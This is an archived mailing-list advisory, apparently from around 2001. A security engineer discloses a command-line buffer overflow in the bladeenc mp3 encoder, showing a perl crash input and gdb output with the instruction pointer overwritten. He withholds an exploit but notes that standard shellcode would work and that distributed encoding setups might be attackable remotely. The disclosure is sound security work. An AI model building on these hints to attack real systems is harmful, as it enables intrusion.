Hello everybody, Some time ago I discovered a buffer overflow vulnerability in bladeenc. Bladeenc is an open source mp3 encoder, widely used under linux. The program segfaults when a large string is given as argument on program startup. Under normal conditions, the syntax of bladeenc is like : bladeenc filename.wav If you change 'filename.wav' with a large string (around 300 chars), bladeenc crashes, overwriting %eip. Also, other options which can be specified trough argv[] can be exploited too. (I guess that the problem can be found in the argument parsing functions of the program - I didn't have much time to investigate the source, but a brief grep strcpy of the source gives few lines of output which may be useful) Bellow is a shot of what happens : [pesho@dingo stack]$ bladeenc `perl -e "print 'a' x 300"` Segmentation fault (core dumped) [pesho@dingo stack]$ gdb bladeenc core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. ........ Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) info reg eax 0x41414141 1094795585 ecx 0x12c 300 edx 0xbffffa00 -1073743360 ebx 0x41414141 1094795585 esp 0xbfffe470 0xbfffe470 ebp 0x41414141 0x41414141 <--- esi 0x41414141 1094795585 <--- edi 0x41414141 1094795585 <--- eip 0x41414141 0x41414141 <--- here we are ... eflags 0x10216 66070 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 fctrl 0x37f 895 fstat 0x0 0 ftag 0xffff 65535 fiseg 0x23 35 fioff 0x804a34a 134521674 foseg 0x2b 43 fooff 0xbfffe4d8 -1073748776 fop 0x59d 1437 (gdb) So, as you see, the overflow is exploitable. I am not going to post an exploit to it, although very basic standard shellcode works against it. The overflow isn't really a security hole, since the binary isn't setuid. However, looking around with google, there are few systems that use bladeenc for some kind of 'distributed mp3 encoding'. They apparently consist of different daemons exchanging parts of audio and encoding them with bladeenc. There are few of those systems that could possibly be explited (and probably REMOTELY) using this overflow. Maybe someone on the list would like to test such systems and do some more research on the 'vulnerability'. For people who would like to test, standard shellcode from 'smashing the stack ...' should do the job. The author has been informed around two months ago - no answer received. At the time of the tests, the last stable version was still vulnerable - I don't know if the version has changed since. Thank you all. Peter -- ------------------------------------------------------------------ Peter Boutzev Ubizen (Luxembourg) Securirty Engineer We Secure e-Business Phone +352 26 31 05 85 http://www.ubizen.com Fax +352 26 31 05 86 ------------------------------------------------------------------ -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBDpxOmQRBACXNyC+kUQ5vpB33ogP+AERWaDmN67MDAhHCnD/BOCrRIII/3a5 tMuNOM7ZaxB4WzLuh22D3W4qZ+hiyT4YmPZY3Bp5BPlk9sw9edg4lA2vAVyUZTFP 7Vth30IPVv1ZKQzLjbCqWhcifogBnfa2bSK7zDdtGopyqxrAquGzidKZWwCg0jTJ L5dxS7X1bRSuOvzfshAgkc0D/3/A4FZ8H96muARXzK2UmcTiZCMiqljeMqRVj5EF n9h1+YpnztKol4Aet1Jzc5NAkWdKJekWeEtD+o1PPMIk8JqznxeJKNvEz3w7GXkc ev3NlD1CE/vmOjVY3HL+vuy7roi0s9JjlR8Vx8PUGB33XkExyDV5hwwu5FvhWbBc CYwEA/9QnoEen3atWc4f68ybkOHK5SwVPsJAMCopcrxDZLi/Zeb5t089m/GBQuwx k/r3CAZsFNE9MfxlRI4pqGQIM0i181XMrWhWCd94Oye6ZtZwld4lLhj63G79mGwA gTstI5wN8CjLKGPMXBMekbRKZF9cFmQyMg59zIDxvsPxRRfNqLRRUGV0ZXIgQm91 dHpldiAoU2VjdXJpdHkgRW5naW5lZXIsIFViaXplbiAtIEx1eGVtYm91cmcpIDxw ZXRlci5ib3V0emV2QHViaXplbi5jb20+iFYEExECABYFAjpxOmQECwoEAwMVAwID FgIBAheAAAoJEBsz1EGWGSGhIz8An1pkbyiaT7ro0w2e+Nzfrmim2i4dAJ44gYu5 d2fWx/zPaEmjPL5teL3stbkCDQQ6cTqEEAgAoztHrJYizUxHMZn+PLGBLR1IX8ox 3KLnADxcMRPTnFdckdI/2ri9/Khdx7X9Pq29vN9Tr6/DBu0wneje3xizuTOi18Ho PHlTYQEvacJgvpYVWdkDMOPqSYD3/0uPV5k2Ei9fUuw9Sh5iykWzwMMWeZHLjXVf hBEM1VhXPxxnW6KmpLfw1LH8Zso/CWSdXtnwPfApY/GfHFtowicg9aPCgnCKfG6T /rRMlZJPCt8ViZ+2yH6GvVb/P1a9+VPjN1WpRCeaKDai/UYBMTT/Zm5dPa55pVOe cqKYYygYeG8Tm3COA28PUlongS26atUhUuESFL5j5+DDkbxYUwLcNJ3vLwADBQf/ eB904eWKB19K0JNG3/KBS40KLNJ5wKgRrEpo9pWXJajMaLy2lJStMh4ZxOuklKvJ A+c8cZIw+D6fC2SHuyL2vTN76cCgLYAk82pbvJuYFWOBOqJhzMfTIp31phcAlqaA gDiG2yUFnxJ8QnbTLNYvbisT964ehPN3bQkRDAkEUZHl6EK7K/gu8HNDp0/wcSxR BSKfrFbSK/iVlBbhKBWjKXx5B3pzfoqu0pTTqIZ4u1At9d81jKkTpIKELIVMLsoP eXxL7quSmKW5GHUi0e2t9LBKZLHkAQ9GsEKyn3wDgQpX2UoI3wMjSsRs/jv0FxRp 7+pgtVEDkq891VFP2v0MzohGBBgRAgAGBQI6cTqEAAoJEBsz1EGWGSGhuuEAn2Rc Q/Uo5rUScmLD4rJkCVUKomREAJ9i34KDIjrHXnw6R2pU21+INRetUA== =uLhC -----END PGP PUBLIC KEY BLOCK-----
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 22:27:59 PST